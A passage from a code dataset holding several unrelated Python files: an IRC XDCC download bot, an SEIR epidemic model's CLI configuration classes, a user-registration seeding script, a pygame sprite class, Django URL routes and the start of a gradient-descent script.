self).__init__(nickname, realname, server, port)\n\n\n\tdef get_filehandle(self, fileName):\n\t\t# We're already receiving the file at this point, apparently.\n\t\tif self.state != \"xdcc requested\":\n\t\t\tself.log.error(\"DCC SEND Received when not waiting for DCC transfer! 
Current state = %s\", self.state)\n\t\t\treturn False\n\n\n\n\t\tfqFName, ext = os.path.splitext(fileName)\n\t\tfileName = \"%s [IRC]%s\" % (fqFName, ext)\n\n\t\tself.currentItem[\"downloadPath\"] = self.db.getDownloadPath(self.currentItem, fileName)\n\t\treturn open(self.currentItem[\"downloadPath\"], \"wb\")\n\n\tdef xdcc_receive_start(self):\n\t\tif not self.currentItem:\n\t\t\tself.log.error(\"DCC Receive start when no item requested?\")\n\t\t\tself.changeState(\"idle\")\n\t\t\treturn False\n\t\tif not self.checkState(\"xdcc requested\"):\n\t\t\tself.log.error(\"XDCC Transfer started when it was not requested!\")\n\t\t\tself.changeState(\"idle\")\n\t\t\treturn False\n\t\tself.log.info(\"XDCC Transfer starting!\")\n\n\t\tself.changeState(\"xdcc receiving\")\n\t\treturn True\n\n\t\t# Intercept on_ctcp, so we can catch errors there (connection failures, etc...)\n\tdef on_ctcp(self, c, e):\n\t\ttry:\n\t\t\tsuper().on_ctcp(c, e)\n\t\texcept (ConnectionRefusedError, irc.client.DCCConnectionError):\n\t\t\tself.log.error(\"Failed to establish DCC connection!\")\n\t\t\tself.log.error(traceback.format_exc())\n\t\t\tself.changeState(\"xdcc failed\")\n\n\tdef on_dccmsg(self, c, e):\n\t\tif not self.checkState(\"xdcc requested\") and \\\n\t\t\tnot self.checkState(\"xdcc receiving\"):\n\t\t\tself.log.error(\"DCC Message when not receiving data!\")\n\t\t\ttry:\n\t\t\t\tself._dcc_disconnect(c, e)\n\t\t\texcept ValueError:\n\t\t\t\tself.log.error(\"Connection not yet open, cannot close\")\n\n\t\telse:\n\t\t\tsuper().on_dccmsg(c, e)\n\n\n\tdef xdcc_receive_finish(self):\n\t\tself.log.info(\"XDCC Transfer finished!\")\n\t\tself.changeState(\"xdcc finished\")\n\n\n\t\tdedupState = MangaCMSOld.cleaner.processDownload.processDownload(self.currentItem[\"seriesName\"], self.currentItem[\"downloadPath\"], deleteDups=True)\n\t\tself.log.info( \"Done\")\n\n\t\tself.db.addTags(dbId=self.currentItem[\"dbId\"], tags=dedupState)\n\t\tif dedupState != \"damaged\":\n\t\t\tself.db.updateDbEntry(self.currentItem[\"sourceUrl\"], dlState=2)\n\t\telse:\n\t\t\tself.db.updateDbEntry(self.currentItem[\"sourceUrl\"], dlState=-10)\n\n\n\tdef checkState(self, checkState):\n\t\tif not checkState in self.states:\n\t\t\traise ValueError(\"Tried to check an invalid state! Invalid state = %s\" % checkState)\n\t\treturn self.state == checkState\n\n\tdef changeState(self, newState):\n\t\tif not newState in self.states:\n\t\t\traise ValueError(\"Tried to set invalid state! 
New state = %s\" % newState)\n\t\tself.log.info(\"State changing to %s from %s\", newState, self.state)\n\t\tself.state = newState\n\n\tdef requestItem(self, reqItem):\n\n\t\tinfo = json.loads(reqItem[\"sourceId\"])\n\t\treqItem[\"info\"] = info\n\t\t# print(\"info\", info[\"fName\"])\n\n\n\t\tif not \"#\"+reqItem[\"info\"][\"channel\"] in self.channels:\n\t\t\tself.log.info(\"Need to join channel %s\", reqItem[\"info\"][\"channel\"])\n\t\t\tself.log.info(\"Already on channels %s\", self.channels)\n\t\t\tself.connection.join(\"#\"+reqItem[\"info\"][\"channel\"])\n\t\t\ttime.sleep(3)\n\t\tself.log.info(\"Joined channels %s\", self.channels)\n\n\t\tself.currentItem = reqItem\n\t\tself.changeState(\"xdcc requested\")\n\t\treqStr = \"xdcc send %s\" % reqItem[\"info\"][\"pkgNum\"]\n\t\tself.connection.privmsg(reqItem[\"info\"][\"botName\"], reqStr)\n\t\tself.log.info(\"Request = '%s - %s'\", reqItem[\"info\"][\"botName\"], reqStr)\n\n\t\tself.db.updateDbEntry(reqItem[\"sourceUrl\"], seriesName=reqItem[\"seriesName\"], dlState=1)\n\n\tdef triggerItem(self, reqItem):\n\n\t\tinfo = json.loads(reqItem[\"sourceId\"])\n\t\tprint(\"reqItem = \", reqItem)\n\t\tprint(\"Item = \", info)\n\n\t\tif not \"#\"+info[\"channel\"] in self.channels:\n\t\t\tself.log.info(\"Need to join channel %s\", info[\"channel\"])\n\t\t\tself.log.info(\"Already on channels %s\", self.channels)\n\t\t\tself.connection.join(\"#\"+info[\"channel\"])\n\t\t\ttime.sleep(3)\n\n\t\tself.currentItem = reqItem\n\t\tself.changeState(\"xdcc requested\")\n\t\tself.connection.privmsg(\"#\"+info[\"channel\"], info['trigger'])\n\t\tself.log.info(\"Sending trigger '%s' to '%s'\", info['trigger'], info[\"channel\"])\n\n\t\tself.db.updateDbEntry(reqItem[\"sourceUrl\"], dlState=1)\n\n\tdef markDownloadFailed(self):\n\t\tself.log.error(\"Timed out on XDCC Request!\")\n\t\tself.log.error(\"Failed item = '%s'\", self.currentItem)\n\t\tself.db.updateDbEntry(self.currentItem[\"sourceUrl\"], dlState=-1)\n\t\tself.currentItem = None\n\n\n\tdef markDownloadFinished(self):\n\t\tself.log.info(\"XDCC Finished!\")\n\t\tself.log.info(\"Item = '%s'\", self.currentItem)\n\n\t\tself.currentItem = None\n\t\tself.received_bytes = 0\n\n\n\tdef stepStateMachine(self):\n\t\tif self.state == \"idle\":\n\t\t\ttodo = self.xdcc.retreiveTodoLinkFromDB()\n\t\t\tif todo: # Have something to download via XDCC\n\t\t\t\tself.db = self.xdcc\n\t\t\t\tself.requestItem(todo)\n\t\t\t\tself.timer = time.time()\n\t\t\t\treturn\n\n\t\t\ttodo = self.trgr.retreiveTodoLinkFromDB()\n\t\t\tif todo: # Have something to download via Trigger\n\t\t\t\tself.db = self.trgr\n\t\t\t\tself.triggerItem(todo)\n\t\t\t\tself.timer = time.time()\n\t\t\t\treturn\n\n\t\t\t# sleep 30 minutes if there was nothing to do.\n\t\t\tfor x in range(30*60):\n\t\t\t\ttime.sleep(1)\n\t\t\t\tif not runStatus.run:\n\t\t\t\t\tbreak\n\n\t\telif self.state == \"xdcc requested\":\n\t\t\tif time.time() - self.timer > self.xdcc_wait_time:\n\t\t\t\tself.changeState(\"xdcc failed\")\n\n\t\telif self.state == \"xdcc receiving\": # Wait for download to finish\n\t\t\tpass\n\n\t\telif self.state == \"xdcc finished\": # Wait for download to finish\n\t\t\tself.markDownloadFinished()\n\t\t\tself.changeState(\"idle\")\n\n\t\telif self.state == \"xdcc failed\": # Wait for download to finish\n\t\t\tself.markDownloadFailed()\n\t\t\tself.changeState(\"idle\")\n\n\n\tdef processQueue(self):\n\t\tif not self.run:\n\t\t\tself.die(\"Whoops, herped my derp.\")\n\n\t\t# self.log.info(\"QueueProcessor\")\n\t\tif self.state != \"idle\" and 
self.received_bytes != 0:\n\t\t\tself.log.info(\"Current state = %s, rec bytes = %s\", self.state, self.received_bytes)\n\t\tself.stepStateMachine()\n\n\tdef welcome_func(self, c, e):\n\t\t# Tie periodic calls to on_welcome, so they don't back up while we're connecting.\n\n\t\tself.reactor.execute_every(2.5, self.processQueue)\n\t\tself.log.info(\"IRC Interface connected to server %s\", self.server_list)\n\n\n\t\tfor channel in self.base_channels:\n\t\t\tif not channel in self.channels:\n\t\t\t\tself.log.info(\"Need to join: %s\", channel)\n\t\t\t\tself.connection.join(channel)\n\n\n\nclass IrcRetreivalInterface(object):\n\tdef __init__(self):\n\t\tirc_highway_server = \"irc.irchighway.net\"\n\t\tirc_rizon_server = \"irc.rizon.net\"\n\n\t\tself.irc_highway_bot = FetcherBot(settings.ircBot[\"name\"], settings.ircBot[\"rName\"], irc_highway_server)\n\t\tself.rizon_bot = FetcherBot(settings.ircBot[\"name\"], settings.ircBot[\"rName\"], irc_rizon_server)\n\n\tdef startBot(self):\n\n\t\tself.irc_highway_Thread = threading.Thread(target=self.irc_highway_bot.startup)\n\t\tself.irc_highway_Thread.start()\n\n\t\tself.irc_rizon_Thread = threading.Thread(target=self.rizon_bot.startup)\n\t\tself.irc_rizon_Thread.start()\n\n\tdef stopBot(self):\n\t\tprint(\"Calling stopBot\")\n\t\tself.irc_highway_bot.run = False\n\t\tself.rizon_bot.run = False\n\t\tprint(\"StopBot Called\")\n\n\n\n\n\nif __name__ == \"__main__\":\n\timport MangaCMSOld.lib.logSetup\n\timport signal\n\n\n\trunner = IrcRetreivalInterface()\n\n\tdef signal_handler(dummy_signal, dummy_frame):\n\t\tif runStatus.run:\n\t\t\trunStatus.run = False\n\t\t\trunner.stopBot()\n\t\t\tprint(\"Telling threads to stop\")\n\t\telse:\n\t\t\tprint(\"Multiple keyboard interrupts. Raising\")\n\t\t\traise KeyboardInterrupt\n\n\n\tsignal.signal(signal.SIGINT, signal_handler)\n\tMangaCMSOld.lib.logSetup.initLogging()\n\n\n\trunner.startBot()\n\n\n\n","repo_name":"herp-a-derp/MangaCMS","sub_path":"MangaCMSOld/ScrapePlugins/M/IrcGrabber/FetchBot.py","file_name":"FetchBot.py","file_ext":"py","file_size_in_byte":11184,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"35328281690","text":"import numpy as np\nimport json\n\nfrom pathlib import Path\nfrom dataclasses import dataclass, field, asdict\nfrom typing import List, Optional, Union\n\nfrom seir.defaults import (\n NB_SAMPLES_DEFAULT,\n NB_RUNS_DEFAULT,\n AGE_GROUPS_DEFAULT,\n R0_DEFAULT,\n REL_BETA_LOCKDOWN_DEFAULT,\n REL_BETA_PERIOD_DEFAULT,\n REL_BETA_ASYMPTOMATIC_DEFAULT,\n PROP_A_DEFAULT,\n PROP_S_DEFAULT,\n PROP_S_TO_H_DEFAULT,\n PROP_H_TO_C_DEFAULT,\n PROP_H_TO_D_DEFAULT,\n PROP_C_TO_D_DEFAULT,\n TIME_INCUBATE_DEFAULT,\n TIME_INFECTIOUS_DEFAULT,\n TIME_S_TO_H_DEFAULT,\n TIME_S_TO_C_DEFAULT,\n TIME_H_TO_C_DEFAULT,\n TIME_H_TO_R_DEFAULT,\n TIME_H_TO_D_DEFAULT,\n TIME_C_TO_R_DEFAULT,\n TIME_C_TO_D_DEFAULT,\n CONTACT_K_DEFAULT,\n HOSPITAL_LOADING_DEFAULT,\n MORTALITY_LOADING_DEFAULT\n)\n\n\ndef list_field(default=None, metadata=None):\n return field(default_factory=lambda: default, metadata=metadata)\n\n\ndef _sample_cli_attr(attr, nb_groups, nb_samples) -> np.ndarray:\n if len(attr) == 1:\n return np.expand_dims(np.asarray(attr[0]), axis=(0, 1))\n elif len(attr) == 2:\n return np.random.uniform(attr[0], attr[1], size=(nb_groups, nb_samples))\n else:\n raise ValueError(f\"Uniform distribution should have two values, a lower and upper bound. 
Got {len(attr)} \"\n f\"number of parameters instead.\")\n\n\n\nclass BaseCLI:\n \"\"\"\n Base class for all command line interface dataclass objects. These are designed to be used with the\n DataClassArgumentParser object from the seir.argparser module. Contains basic methods that allow the CLI\n arguments to be saved as a json object or parsed as a json string.\n\n Objects inheriting from this should be a dataclass. Parameters of the inherited objects should be defined as a\n dataclass field, with a dict \"metadata\" being parsed as the kwargs of an argument in python's built-in argparse\n module.\n \"\"\"\n\n def to_json(self, fp: Union[str, Path]):\n \"\"\"\n Saves the command line interface object to a json file. Only saves the file, will not create any parent\n directories.\n\n Parameters\n ----------\n fp: str, Path\n The file path at which to save the object's json string.\n\n Returns\n -------\n None\n \"\"\"\n if isinstance(fp, str):\n fp = Path(fp)\n if not fp.parent.is_dir():\n raise ValueError(f\"The directory {fp.parent} is not a directory.\")\n\n with fp.open('w') as f:\n json.dump(asdict(self), f, indent=4)\n\n def to_json_string(self) -> str:\n \"\"\"\n Returns the json string of the command line object.\n\n Returns\n -------\n json_string: str\n The json string of the object.\n \"\"\"\n return json.dumps(asdict(self), indent=4)\n\n\nclass BaseDistributionCLI(BaseCLI):\n \"\"\"\n Base class for command line arguments that define distributions. Assumes that the defined distribution is uniform.\n Parses its own arguments by treating a single input in a list as a float, and two inputs as defining the bounds\n of a uniform distribution. Possesses a sample_attr method that will return a number of random samples from the\n uniform distribution, shaped in such a way as to be digested by the sample parameter objects in the seir.parameters\n module.\n\n Objects inheriting from this should be a dataclass. Parameters of the inherited objects should be defined as a\n dataclass field, with a dict \"metadata\" being parsed as the kwargs of an argument in python's built-in argparse\n module.\n \"\"\"\n\n _defaults_dict = {}\n\n def __post_init__(self):\n if not self._defaults_dict.keys() == self.__dict__.keys():\n raise NotImplementedError(\"CLI objects _defaults_dict should contain the default values for all \"\n \"attributes.\")\n self._set_defaults()\n\n def _set_defaults(self):\n \"\"\"\n Method for setting of defaults in the base distribution object. Used to overcome problems with setting the\n defaults of parameters that allow appending via the key value pair (\"action\", \"append\") in a\n parameter's metadata.\n\n Returns\n -------\n out: bool\n Returns true if performed successfully.\n \"\"\"\n self_vars = self.__dict__\n for k in self_vars:\n self_vars[k] = self._defaults_dict.get(k, None) if self_vars[k] is None else self_vars[k]\n return True\n\n def sample_attr(self, attr: str, nb_groups: int = 1, nb_samples: int = 1) -> np.ndarray:\n \"\"\"\n Samples an attribute of the CLI as the required scalar or uniform distribution.\n\n An example of the sampling method applied to an attribute is as follows. Let the attribute of interest be\n named x. If the value of x is a single value in a list, say x=[0.8], then this method will return the\n zero-dimensional numpy array: array(0.8). If instead two values are present, say x=[0, 1], then x is sampled\n from the uniform distribution x ~ U(0, 1). 
If the parameter's metadata allows for appending, then x will be a\n list of lists, say x=[[0.8, 0.9], [0, 1]]. In this case the sampling algorithm is applied to each value within\n the list, leading to a concatenated array x ~ [U(0.8, 0.9), U(0, 1)].\n\n Parameters\n ----------\n attr: str\n Attribute of the CLI to parse.\n\n nb_groups: int, default=1\n Number of population groups from which to define the size of the uniform distribution.\n\n nb_samples: int, default=1\n Number of samples to take from the uniform distribution.\n\n Returns\n -------\n out: np.ndarray\n Returns either a zero dimensional float as a numpy array, or a numpy array of size (nb_groups, nb_samples).\n If the attribute's metadata allows appending, then instead the method is applied to each element in the list\n of appended values, returning an array of shape (n, nb_samples), where n is the number of appended elements.\n \"\"\"\n attr_val = getattr(self, attr)\n try:\n if (\n hasattr(self.__dataclass_fields__[attr].type, '__origin__')\n and issubclass(self.__dataclass_fields__[attr].type.__origin__, List)\n ):\n if self.__dataclass_fields__[attr].metadata.get('action', None) == 'append':\n return np.concatenate([_sample_cli_attr(x, 1, nb_samples) for x in attr_val], axis=0)\n return np.asarray(_sample_cli_attr(attr_val, nb_groups, nb_samples))\n return attr_val\n except Exception as e:\n raise ValueError(f\"Attribute '{attr}' failed to be parsed. Raised exception '{e}'.\")\n\n\n@dataclass\nclass LockdownCLI(BaseDistributionCLI):\n \"\"\"\n Lockdown CLI. Used to define the periods of various phases of a lockdown, as well as the relative strength of the\n effects. Any number of lockdown periods and strengths can be defined.\n \"\"\"\n\n _defaults_dict = {\n 'rel_beta_lockdown': REL_BETA_LOCKDOWN_DEFAULT,\n 'rel_beta_period': REL_BETA_PERIOD_DEFAULT,\n }\n\n rel_beta_lockdown: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Bounds of relative beta uniform prior distributions corresponding to relative beta \"\n \"periods. Used to inform the behavior of Rt during periods of lockdown. Negative lower bound \"\n \"implies using the previous sample as a minimum (minus the negative value). Can be called multiple \"\n \"times to create multiple successive lockdown levels.\",\n \"action\": \"append\"\n }\n )\n\n rel_beta_period: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Length of each period for which the relative betas apply, in days, after the start of lockdown.\"\n \" Can be called multiple times to define multiple successive lockdown periods occurring one after \"\n \"the other.\",\n \"action\": \"append\"\n }\n )\n\n def __post_init__(self):\n super().__post_init__()\n assert len(self.rel_beta_period) == len(self.rel_beta_lockdown), \\\n f\"There should be a one-to-one correspondence between the number of lockdown periods and the strengths of \" \\\n f\"each of the lockdown periods. Instead found {len(self.rel_beta_period)} number of lockdown periods \" \\\n f\"and {len(self.rel_beta_lockdown)} number of lockdown strengths.\"\n\n def sample_attr(self, attr: str, nb_groups: int = 1, nb_samples: int = 1) -> List[np.ndarray]:\n \"\"\"\n Overrides the base sample_attr method to suit the needs of the lockdown parameters. 
Since lockdowns can have\n various strengths, and some periods may be more certain than others, the output of this sampling method is to\n produce a variable list of numpy arrays, rather than a single numpy array.\n\n Parameters\n ----------\n attr: str\n The attribute to sample.\n\n nb_groups: int, default=1\n The number of population groups to sample for.\n\n nb_samples: int, default=1\n The number of samples to take.\n\n Returns\n -------\n out: list\n List of numpy arrays. If the parsed value contained a single element, then a zero dimensional array is\n returned in its place, otherwise a set of samples is given from a uniform distribution defined by the bounds\n of the parsed value.\n \"\"\"\n attr_val = getattr(self, attr)\n outputs = [_sample_cli_attr(attr_val[0], nb_groups, nb_samples)]\n for i in range(1, len(attr_val)):\n if len(attr_val[i]) == 1:\n outputs.append(_sample_cli_attr(attr_val[i], nb_groups, nb_samples))\n elif len(attr_val[i]) == 2:\n if attr_val[i][0] < 0:\n outputs.append(np.random.uniform(outputs[i-1] - abs(attr_val[i][0]), attr_val[i][1],\n size=(nb_groups, nb_samples)))\n else:\n outputs.append(np.random.uniform(attr_val[i][0], attr_val[i][1], size=(nb_groups, nb_samples)))\n return outputs\n\n\n@dataclass\nclass OdeParamCLI(BaseDistributionCLI):\n \"\"\"\n Command line interface for all parameters relating to the ASSA Covid SEIR ordinary differential equation.\n \"\"\"\n\n _defaults_dict = {\n 'r0': R0_DEFAULT,\n 'rel_beta_asymptomatic': REL_BETA_ASYMPTOMATIC_DEFAULT,\n 'prop_a': PROP_A_DEFAULT,\n 'prop_s': PROP_S_DEFAULT,\n 'prop_s_to_h': PROP_S_TO_H_DEFAULT,\n 'prop_h_to_c': PROP_H_TO_C_DEFAULT,\n 'prop_h_to_d': PROP_H_TO_D_DEFAULT,\n 'prop_c_to_d': PROP_C_TO_D_DEFAULT,\n 'time_incubate': TIME_INCUBATE_DEFAULT,\n 'time_infectious': TIME_INFECTIOUS_DEFAULT,\n 'time_s_to_h': TIME_S_TO_H_DEFAULT,\n 'time_s_to_c': TIME_S_TO_C_DEFAULT,\n 'time_h_to_c': TIME_H_TO_C_DEFAULT,\n 'time_h_to_r': TIME_H_TO_R_DEFAULT,\n 'time_h_to_d': TIME_H_TO_D_DEFAULT,\n 'time_c_to_r': TIME_C_TO_R_DEFAULT,\n 'time_c_to_d': TIME_C_TO_D_DEFAULT,\n 'contact_k': CONTACT_K_DEFAULT,\n 'mortality_loading': MORTALITY_LOADING_DEFAULT,\n 'hospital_loading': HOSPITAL_LOADING_DEFAULT,\n 'smoothing_time': 11,\n }\n\n r0: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Basic reproductive number r0. Single input defines a scalar value, two inputs define a \"\n \"Uniform prior.\"\n }\n )\n\n rel_beta_asymptomatic: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"The relative infectivity strength of asymptomatic cases. Single input defines a scalar value, two\"\n \" inputs define a Uniform prior.\"\n }\n )\n\n prop_a: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of asymptomatic infected individuals. Single input defines a scalar, two inputs define \"\n \"a Uniform prior.\"\n }\n )\n\n prop_s: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of symptomatic individuals (1 - prop_a) that experience severe symptoms. Defaults to \"\n \"attack rates defined by Ferguson et. al. (see References documentation). \",\n \"action\": \"append\"\n }\n )\n\n prop_s_to_h: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of severe cases that will be admitted to general hospital. The rest will present \"\n \"directly to ICU. 
Defaults to calculations based off WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n prop_h_to_c: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of general hospital cases expected to be transferred to critical care. Defaults to \"\n \"calculations based off WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n prop_h_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of general hospital cases that are expected to die. Defaults to calculations based off \"\n \"WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n prop_c_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Proportion of critical care cases that are expected to die. Defaults to calculations based off \"\n \"WC data (see Data documentation).\",\n \"action\": \"append\"\n }\n )\n\n time_incubate: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days of disease incubation. Defaults to 5.1. Single input defines a scalar, two inputs define a \"\n \"Uniform prior.\"\n }\n )\n\n time_infectious: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days that infectious individuals can spread the virus.\"\n }\n )\n\n time_s_to_h: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from onset of symptoms to hospital admission for severe cases. Defaults to 6. Single input \"\n \"defines a scalar, two inputs define a Uniform prior.\"\n }\n )\n\n time_s_to_c: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from onset of symptoms to critical care admission for severe cases. Defaults to 6. Single \"\n \"input defines a scalar, two inputs define a Uniform prior.\"\n }\n )\n\n time_h_to_c: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from admission of general hospital to critical care, for those that will require it. \"\n \"Defaults to calculations based off WC data (see Data documentation).\"\n }\n )\n\n time_h_to_r: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from general hospital admission to recovery, for those that will recover. Defaults to \"\n \"calculations from WC data (see Data documentation).\"\n }\n )\n\n time_h_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from general hospital admission to death, for those that will die. Defaults to calculations \"\n \"from WC data (see Data documentation).\"\n }\n )\n\n time_c_to_r: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from critical care admission to recovery, for those that will recover. Defaults to \"\n \"calculations from WC data (see Data documentation).\"\n }\n )\n\n time_c_to_d: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Days from critical care admission to death, for those that will die. Defaults to \"\n \"calculations from WC data (see Data documentation).\"\n }\n )\n\n contact_k: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Contact heterogeneity factor from Kong et. al. (see References documentation). Defaults to 0, \"\n \"implying contact is homogeneous.\"\n }\n )\n\n mortality_loading: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Mortality loading parameter applied to deaths. 
Used to pseudo inform the uncertainty in these\"\n \"parameters while keeping the shape of mortality over age groups constant.\"\n }\n )\n\n hospital_loading: List[float] = list_field(\n default=None,\n metadata={\n \"help\": \"Hospital loading parameter applied to inbound patients. Used to pseudo inform the uncertainty \"\n \"in these parameters while keeping the shape of those going to hospital over age groups constant.\"\n }\n )\n\n smoothing_time: float = field(\n default=11,\n metadata={\n \"help\": \"Period over which the lockdown is smoothed before the lockdown begins. Interpolates the relative \"\n \"beta strength from 1 to the first lockdown beta strength value linearly over the smoothing period.\"\n }\n )\n\n\n@dataclass\nclass MetaCLI(BaseCLI):\n \"\"\"\n Command line interface that stores any meta data about the system we are solving, such as the number of samples\n the ode is taking, as well as whether or not the model should incorporate an age heterogeneous structure. The age\n heterogeneity is introduced by means of 10 year age bands.\n \"\"\"\n\n nb_samples: Optional[int] = field(\n default=NB_SAMPLES_DEFAULT,\n metadata={\n \"help\": \"Number of samples to take for the prior distributions in the ASSA model SIR algorithm.\"\n }\n )\n\n age_heterogeneity: bool = field(\n default=AGE_GROUPS_DEFAULT,\n metadata={\n \"help\": \"Flag to set the use of population age bands. Bands are in ten years, from 0-9, 10-19, ..., to \"\n \"80+. The age defined attack rates are informed by Ferguson et al. (see References documentation).\"\n }\n )\n\n nb_groups: int = field(init=False)\n\n def __post_init__(self):\n self.nb_groups = 9 if self.age_heterogeneity else 1\n\n\n@dataclass\nclass FittingCLI(BaseCLI):\n \"\"\"\n Command line interface for all fitting parameters used by the model.\n \"\"\"\n\n nb_runs: Optional[int] = field(\n default=NB_RUNS_DEFAULT,\n metadata={\n \"help\": \"Number of runs to perform. Used when running into memory errors with a large number of samples. \"\n \"Final result will have had nb_samples * nb_runs number of samples for the prior, and \"\n \"ratio_resample * nb_samples * nb_runs number of resamples.\"\n }\n )\n\n ratio_resample: Optional[float] = field(\n default=0.05,\n metadata={\n \"help\": \"The proportion of resamples to take in the SIR algorithm.\"\n }\n )\n\n fit_totals: bool = field(\n default=True,\n metadata={\n \"help\": \"Fit data to the sub totals of all population groups. Useful when the data does not contain \"\n \"population group differences (as in, for example, the DSFSI data).\"\n }\n )\n\n fit_deaths: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to death data, if available.\"\n }\n )\n\n fit_recovered: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to recovered data, if available.\"\n }\n )\n\n fit_infected: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to infected cases, if available.\"\n }\n )\n\n fit_hospitalised: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to hospital data, if available.\"\n }\n )\n\n fit_critical: bool = field(\n default=False,\n metadata={\n \"help\": \"Fits model to ICU data, if available.\"\n }\n )\n\n fit_daily: bool = field(\n default=False,\n metadata={\n \"help\": \"Will fit to daily cases/deaths/etc. instead of cumulative cases. 
Used to remove the serial \"\n \"dependence found in such cumulative cases.\"\n }\n )\n\n fit_interval: int = field(\n default=1,\n metadata={\n \"help\": \"For concurrent data (hospital/icu cases), fitter will fit to every X data point, where X is \"\n \"defined here. If fitting to daily cases (see --fit_daily), will take a sum of X data points to \"\n \"use in fitting (in order to smooth out the fitting data and account for the noise in daily \"\n \"reporting statistics).\"\n }\n )\n","repo_name":"Percept-Health-Solve/seir-model","sub_path":"seir/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":21282,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32952304303","text":"#!/usr/bin/env python\nimport requests\nport = 8000\nhostname = 'localhost'\nurl = 'http://'+hostname+':'+str(port)+'/auth/register/'\n\n\ndef main():\n print(\"Propagating users...\")\n with open(\"list_users\") as file:\n listOfShops = file.readlines()\n for row in listOfShops:\n row = row.strip().split()\n print(row)\n payload = {'email': row[0], \n 'phone_number': row[1],\n 'password': row[2],\n 'is_supplier': row[3]}\n\n request = requests.post(url, data=payload)\n print(\"Requested: \"+request.url)\n print(request.status_code)\n print(request.json())\n\nmain()\n","repo_name":"ahmed-emam/dukanty","sub_path":"src/propagateDatabase/propagateUsers.py","file_name":"propagateUsers.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29573876726","text":"\"\"\"\nFile for creating the Serra (saw) class\n\"\"\"\nimport pygame\nfrom auxiliar import *\n\n\nclass Serra(object):\n def __init__(self, x, y, larg, alt):\n self.x = x\n self.y = y\n self.larg = larg\n self.alt = alt\n self.hitbox = (x, y, larg, alt)\n self.aniCount = 0\n self.img = [pygame.image.load('Img/Serra/SAW0.png'),\n pygame.image.load('Img/Serra/SAW1.png'),\n pygame.image.load('Img/Serra/SAW2.png'),\n pygame.image.load('Img/Serra/SAW3.png')]\n\n def draw(self):\n # Define the saw's hitbox area\n self.hitbox = (self.x, self.y, self.larg, self.alt)\n # Counter for the saw animation\n if self.aniCount >= 8:\n self.aniCount = 0\n # Draw the saw\n tela.blit(pygame.transform.scale(self.img[self.aniCount // 2], (50, 50)), (self.x, self.y))\n self.aniCount += 1\n # Draw the saw's hitbox area\n # pygame.draw.rect(tela, (255, 0, 0), self.hitbox, 2)\n\n def collide(self, rect):\n # Collision test on the X axis\n if rect[0] + rect[2] > self.hitbox[0] and rect[0] < self.hitbox[0] + self.hitbox[2]:\n # Collision test on the Y axis\n if rect[1] + rect[3] > self.hitbox[1]:\n return True\n return False\n","repo_name":"gcb2708/PI_1B_vF","sub_path":"classe_serra.py","file_name":"classe_serra.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17258177096","text":"from django.conf.urls import url\nfrom . 
import views\n\n#different url patterns using the different methods\napp_name = 'blog'\n\nurlpatterns = [\n\turl(r'^$',views.post_list),\n\turl(r'add$',views.add, name='add'),\n#\turl(r'details/(?P[\\w :-]+)/$', views.blog_detail, name=\"detail\"),\n\turl(r'details/(?P[0-9]+)/$', views.blog_detail, name=\"detail\"),\n\turl(r'new_post/$', views.post_new, name=\"new_post\"),\n\turl(r'edit_post/(?P[0-9]+)/$', views.post_edit, name=\"post_edit\"),\n#\turl(r'^comment/(?P\\d+)/comment/$', views.add_comment_to_post, name='add_comment_to_post'),\n]\n","repo_name":"Haris1337/Tutorial1","sub_path":"mysite/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40794079234","text":"import numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\ndef hardCodeGradientDescent(columns):\n\tlearn_rate=0.0001\n\tnumber_iter=100\n\tinitial_weights=np.random.normal(size=(columns,1))\n\treturn learn_rate,number_iter,initial_weights\n\n\ndef hardCodeTraining(rows):\n\tpercent_training=0.8\n\tnumber_of_dataPoints=rows\n\treturn math.floor(percent_training*number_of_dataPoints)\n\ndef getData():\n\tfileName=\"./Folds5x2_pp.xlsx\"\n\tcolumn_headers=[\"Temperature\",\"Vacuum\",\"Pressure\",\"Humidity\",\"Power\"]\n\ttempFrame = pd.read_excel(fileName,sheet_name=0,names=column_headers)\n\treturn tempFrame\n\ndef predict(weights,inp):\n\treturn np.matmul(inp,weights) # weights is a column matrix\n\ndef 